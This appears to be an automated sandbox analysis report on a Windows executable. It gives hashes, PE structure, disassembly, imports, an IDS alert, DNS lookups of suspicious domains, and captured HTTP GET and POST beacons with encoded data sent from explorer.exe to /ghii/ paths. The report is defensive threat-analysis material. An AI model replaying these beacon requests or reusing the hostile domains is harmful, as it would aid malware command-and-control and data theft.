                                                                  SHA512:7291dffef85f680b33a57cbacfec946d80a9464250b0189c3276ff61e3883f65a3600337536a8fc1059c376a25dc3062c2a86c3326782d70f7b99cabd32f6f4e
                                                                  SSDEEP:6144:vYa63d5V/FxuxYISEhpuOuQbKuH5vaotnKyn9gmXZL:vY1DVPuxFbug5yotKy9gmp
                                                                  TLSH:AB44138C7790D2FFE5A30672F8F43D1EBED8A91630B5650B23209A5DBA1A1078D1E753
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....
                                                                  Icon Hash:b2a88c96b2ca6a72
                                                                  Entrypoint:0x403640
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:61259b55b8912888e90f516ca08dc514
                                                                  Instruction
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  sub esp, 000003F4h
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  push 00000020h
                                                                  pop edi
                                                                  xor ebx, ebx
                                                                  push 00008001h
                                                                  mov dword ptr [ebp-14h], ebx
                                                                  mov dword ptr [ebp-04h], 0040A230h
                                                                  mov dword ptr [ebp-10h], ebx
                                                                  call dword ptr [004080C8h]
                                                                  mov esi, dword ptr [004080CCh]
                                                                  lea eax, dword ptr [ebp-00000140h]
                                                                  push eax
                                                                  mov dword ptr [ebp-0000012Ch], ebx
                                                                  mov dword ptr [ebp-2Ch], ebx
                                                                  mov dword ptr [ebp-28h], ebx
                                                                  mov dword ptr [ebp-00000140h], 0000011Ch
                                                                  call esi
                                                                  test eax, eax
                                                                  jne 00007F8438B61D3Ah
                                                                  lea eax, dword ptr [ebp-00000140h]
                                                                  mov dword ptr [ebp-00000140h], 00000114h
                                                                  push eax
                                                                  call esi
                                                                  mov ax, word ptr [ebp-0000012Ch]
                                                                  mov ecx, dword ptr [ebp-00000112h]
                                                                  sub ax, 00000053h
                                                                  add ecx, FFFFFFD0h
                                                                  neg ax
                                                                  sbb eax, eax
                                                                  mov byte ptr [ebp-26h], 00000004h
                                                                  not eax
                                                                  and eax, ecx
                                                                  mov word ptr [ebp-2Ch], ax
                                                                  cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                  jnc 00007F8438B61D0Ah
                                                                  and word ptr [ebp-00000132h], 0000h
                                                                  mov eax, dword ptr [ebp-00000134h]
                                                                  movzx ecx, byte ptr [ebp-00000138h]
                                                                  mov dword ptr [0042A318h], eax
                                                                  xor eax, eax
                                                                  mov ah, byte ptr [ebp-0000013Ch]
                                                                  movzx eax, ax
                                                                  or eax, ecx
                                                                  xor ecx, ecx
                                                                  mov ch, byte ptr [ebp-2Ch]
                                                                  movzx ecx, cx
                                                                  shl eax, 10h
                                                                  or eax, ecx
                                                                  Programming Language:
                                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xcd8.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x3b0000xcd80xe00False0.42271205357142855data4.2220183191925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_ICON0x3b1d80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                                                  RT_DIALOG0x3b4c00x100dataEnglishUnited States
                                                                  RT_DIALOG0x3b5c00x11cdataEnglishUnited States
                                                                  RT_DIALOG0x3b6e00x60dataEnglishUnited States
                                                                  RT_GROUP_ICON0x3b7400x14dataEnglishUnited States
                                                                  RT_VERSION0x3b7580x23cdataEnglishUnited States
                                                                  RT_MANIFEST0x3b9980x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States
                                                                  DLLImport
                                                                  ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                  SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                  ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                  COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                  USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                  GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                  KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States
                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  192.168.2.58.8.8.861452532023883 02/22/23-09:04:03.176167UDP2023883ET DNS Query to a *.top domain - Likely Hostile6145253192.168.2.58.8.8.8
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Feb 22, 2023 09:04:03.216502905 CET4971180192.168.2.5107.148.8.96
                                                                  Feb 22, 2023 09:04:03.414630890 CET8049711107.148.8.96192.168.2.5
                                                                  Feb 22, 2023 09:04:03.414819956 CET4971180192.168.2.5107.148.8.96
                                                                  Feb 22, 2023 09:04:03.415231943 CET4971180192.168.2.5107.148.8.96
                                                                  Feb 22, 2023 09:04:03.612726927 CET8049711107.148.8.96192.168.2.5
                                                                  Feb 22, 2023 09:04:03.612766981 CET8049711107.148.8.96192.168.2.5
                                                                  Feb 22, 2023 09:04:03.612798929 CET8049711107.148.8.96192.168.2.5
                                                                  Feb 22, 2023 09:04:03.613018990 CET4971180192.168.2.5107.148.8.96
                                                                  Feb 22, 2023 09:04:03.613254070 CET4971180192.168.2.5107.148.8.96
                                                                  Feb 22, 2023 09:04:03.814923048 CET8049711107.148.8.96192.168.2.5
                                                                  Feb 22, 2023 09:04:18.701509953 CET4971480192.168.2.5194.102.227.30
                                                                  Feb 22, 2023 09:04:21.705425024 CET4971480192.168.2.5194.102.227.30
                                                                  Feb 22, 2023 09:04:27.721556902 CET4971480192.168.2.5194.102.227.30
                                                                  Feb 22, 2023 09:04:40.802951097 CET4971480192.168.2.5194.102.227.30
                                                                  Feb 22, 2023 09:04:43.816939116 CET4971480192.168.2.5194.102.227.30
                                                                  Feb 22, 2023 09:04:49.832747936 CET4971480192.168.2.5194.102.227.30
                                                                  Feb 22, 2023 09:05:04.322082043 CET4971880192.168.2.5194.102.227.30
                                                                  Feb 22, 2023 09:05:07.334500074 CET4971880192.168.2.5194.102.227.30
                                                                  Feb 22, 2023 09:05:10.098979950 CET4971980192.168.2.5184.94.215.91
                                                                  Feb 22, 2023 09:05:10.275305033 CET8049719184.94.215.91192.168.2.5
                                                                  Feb 22, 2023 09:05:10.277825117 CET4971980192.168.2.5184.94.215.91
                                                                  Feb 22, 2023 09:05:10.278014898 CET4971980192.168.2.5184.94.215.91
                                                                  Feb 22, 2023 09:05:10.452974081 CET8049719184.94.215.91192.168.2.5
                                                                  Feb 22, 2023 09:05:10.572180986 CET8049719184.94.215.91192.168.2.5
                                                                  Feb 22, 2023 09:05:10.572218895 CET8049719184.94.215.91192.168.2.5
                                                                  Feb 22, 2023 09:05:10.572243929 CET8049719184.94.215.91192.168.2.5
                                                                  Feb 22, 2023 09:05:10.572268009 CET8049719184.94.215.91192.168.2.5
                                                                  Feb 22, 2023 09:05:10.572288990 CET8049719184.94.215.91192.168.2.5
                                                                  Feb 22, 2023 09:05:10.572307110 CET8049719184.94.215.91192.168.2.5
                                                                  Feb 22, 2023 09:05:10.581387997 CET4971980192.168.2.5184.94.215.91
                                                                  Feb 22, 2023 09:05:11.793392897 CET4971980192.168.2.5184.94.215.91
                                                                  Feb 22, 2023 09:05:13.380606890 CET4971880192.168.2.5194.102.227.30
                                                                  Feb 22, 2023 09:05:13.557565928 CET4972080192.168.2.5184.94.215.91
                                                                  Feb 22, 2023 09:05:13.732559919 CET8049720184.94.215.91192.168.2.5
                                                                  Feb 22, 2023 09:05:13.747772932 CET4972080192.168.2.5184.94.215.91
                                                                  Feb 22, 2023 09:05:13.786932945 CET4972080192.168.2.5184.94.215.91
                                                                  Feb 22, 2023 09:05:13.961515903 CET8049720184.94.215.91192.168.2.5
                                                                  Feb 22, 2023 09:05:14.046334982 CET8049720184.94.215.91192.168.2.5
                                                                  Feb 22, 2023 09:05:14.046395063 CET8049720184.94.215.91192.168.2.5
                                                                  Feb 22, 2023 09:05:14.046425104 CET8049720184.94.215.91192.168.2.5
                                                                  Feb 22, 2023 09:05:14.046453953 CET8049720184.94.215.91192.168.2.5
                                                                  Feb 22, 2023 09:05:14.046475887 CET8049720184.94.215.91192.168.2.5
                                                                  Feb 22, 2023 09:05:14.046498060 CET8049720184.94.215.91192.168.2.5
                                                                  Feb 22, 2023 09:05:14.053232908 CET4972080192.168.2.5184.94.215.91
                                                                  Feb 22, 2023 09:05:14.055648088 CET4972080192.168.2.5184.94.215.91
                                                                  Feb 22, 2023 09:05:14.230503082 CET8049720184.94.215.91192.168.2.5
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Feb 22, 2023 09:04:03.176167011 CET6145253192.168.2.58.8.8.8
                                                                  Feb 22, 2023 09:04:03.196990967 CET53614528.8.8.8192.168.2.5
                                                                  Feb 22, 2023 09:04:18.682127953 CET6344653192.168.2.58.8.8.8
                                                                  Feb 22, 2023 09:04:18.699879885 CET53634468.8.8.8192.168.2.5
                                                                  Feb 22, 2023 09:04:40.783906937 CET5503953192.168.2.58.8.8.8
                                                                  Feb 22, 2023 09:04:40.801707029 CET53550398.8.8.8192.168.2.5
                                                                  Feb 22, 2023 09:05:04.245073080 CET5922053192.168.2.58.8.8.8
                                                                  Feb 22, 2023 09:05:04.263006926 CET53592208.8.8.8192.168.2.5
                                                                  Feb 22, 2023 09:05:10.043173075 CET5506853192.168.2.58.8.8.8
                                                                  Feb 22, 2023 09:05:10.065712929 CET53550688.8.8.8192.168.2.5
                                                                  Feb 22, 2023 09:05:27.673294067 CET5853253192.168.2.58.8.8.8
                                                                  Feb 22, 2023 09:05:27.778459072 CET53585328.8.8.8192.168.2.5
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Feb 22, 2023 09:04:03.176167011 CET192.168.2.58.8.8.80xc40aStandard query (0)www.wenzid4.topA (IP address)IN (0x0001)false
                                                                  Feb 22, 2023 09:04:18.682127953 CET192.168.2.58.8.8.80x4514Standard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                                  Feb 22, 2023 09:04:40.783906937 CET192.168.2.58.8.8.80xbf6fStandard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                                  Feb 22, 2023 09:05:04.245073080 CET192.168.2.58.8.8.80xb3c0Standard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                                  Feb 22, 2023 09:05:10.043173075 CET192.168.2.58.8.8.80x76cStandard query (0)www.energybig.xyzA (IP address)IN (0x0001)false
                                                                  Feb 22, 2023 09:05:27.673294067 CET192.168.2.58.8.8.80xf42bStandard query (0)www.genuineinsights.cloudA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Feb 22, 2023 09:04:03.196990967 CET8.8.8.8192.168.2.50xc40aNo error (0)www.wenzid4.top107.148.8.96A (IP address)IN (0x0001)false
                                                                  Feb 22, 2023 09:04:18.699879885 CET8.8.8.8192.168.2.50x4514No error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                                  Feb 22, 2023 09:04:18.699879885 CET8.8.8.8192.168.2.50x4514No error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                                  Feb 22, 2023 09:04:40.801707029 CET8.8.8.8192.168.2.50xbf6fNo error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                                  Feb 22, 2023 09:04:40.801707029 CET8.8.8.8192.168.2.50xbf6fNo error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                                  Feb 22, 2023 09:05:04.263006926 CET8.8.8.8192.168.2.50xb3c0No error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                                  Feb 22, 2023 09:05:04.263006926 CET8.8.8.8192.168.2.50xb3c0No error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                                  Feb 22, 2023 09:05:10.065712929 CET8.8.8.8192.168.2.50x76cNo error (0)www.energybig.xyz184.94.215.91A (IP address)IN (0x0001)false
                                                                  Feb 22, 2023 09:05:27.778459072 CET8.8.8.8192.168.2.50xf42bNo error (0)www.genuineinsights.cloud66.96.162.149A (IP address)IN (0x0001)false
                                                                  • www.wenzid4.top
                                                                  • www.energybig.xyz
                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.549711107.148.8.9680C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Feb 22, 2023 09:04:03.415231943 CET111OUTGET /ghii/?Azs=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3LCH1xNv1NtM5EA==&OGpK-=bVTY_sdT7 HTTP/1.1
                                                                  Host: www.wenzid4.top
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Feb 22, 2023 09:04:03.612766981 CET112INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 22 Feb 2023 08:02:10 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.549719184.94.215.9180C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Feb 22, 2023 09:05:10.278014898 CET229OUTPOST /ghii/ HTTP/1.1
                                                                  Host: www.energybig.xyz
                                                                  Connection: close
                                                                  Content-Length: 185
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.energybig.xyz
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Accept: */*
                                                                  Referer: http://www.energybig.xyz/ghii/
                                                                  Accept-Language: en-US
                                                                  Accept-Encoding: gzip, deflate
                                                                  Data Raw: 41 7a 73 3d 4b 75 47 55 64 7a 32 39 51 61 76 34 54 6a 52 59 70 51 55 4d 57 62 6d 6d 78 61 4d 6b 79 5f 39 55 4e 6c 47 4b 61 56 4c 4b 45 49 63 36 6f 61 33 38 41 59 4f 7a 63 75 63 4f 67 76 50 7a 63 6a 32 59 63 59 75 70 38 5f 51 4d 71 55 61 38 69 69 71 32 38 63 37 5a 75 59 45 6c 68 79 38 6f 30 4f 39 71 50 67 4b 52 43 6c 57 50 30 65 39 31 6f 2d 6a 4c 48 4f 6c 4d 6d 79 41 46 70 56 46 6b 35 37 6b 5f 63 56 30 79 57 41 48 53 4d 39 63 35 69 59 46 42 54 43 61 63 43 4a 41 71 76 56 47 2d 57 30 44 34 28 69 52 73 42 59 28 32 49 36 46 4f 44 76 36 55 55 41 29 2e 00 00 00 00 00 00 00 00
                                                                  Data Ascii: Azs=KuGUdz29Qav4TjRYpQUMWbmmxaMky_9UNlGKaVLKEIc6oa38AYOzcucOgvPzcj2YcYup8_QMqUa8iiq28c7ZuYElhy8o0O9qPgKRClWP0e91o-jLHOlMmyAFpVFk57k_cV0yWAHSM9c5iYFBTCacCJAqvVG-W0D4(iRsBY(2I6FODv6UUA).
                                                                  Feb 22, 2023 09:05:10.572180986 CET230INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 22 Feb 2023 08:05:10 GMT
                                                                  Server: Apache
                                                                  Content-Length: 5278
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                                  Feb 22, 2023 09:05:10.572218895 CET232INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                                  Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                  Feb 22, 2023 09:05:10.572243929 CET233INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
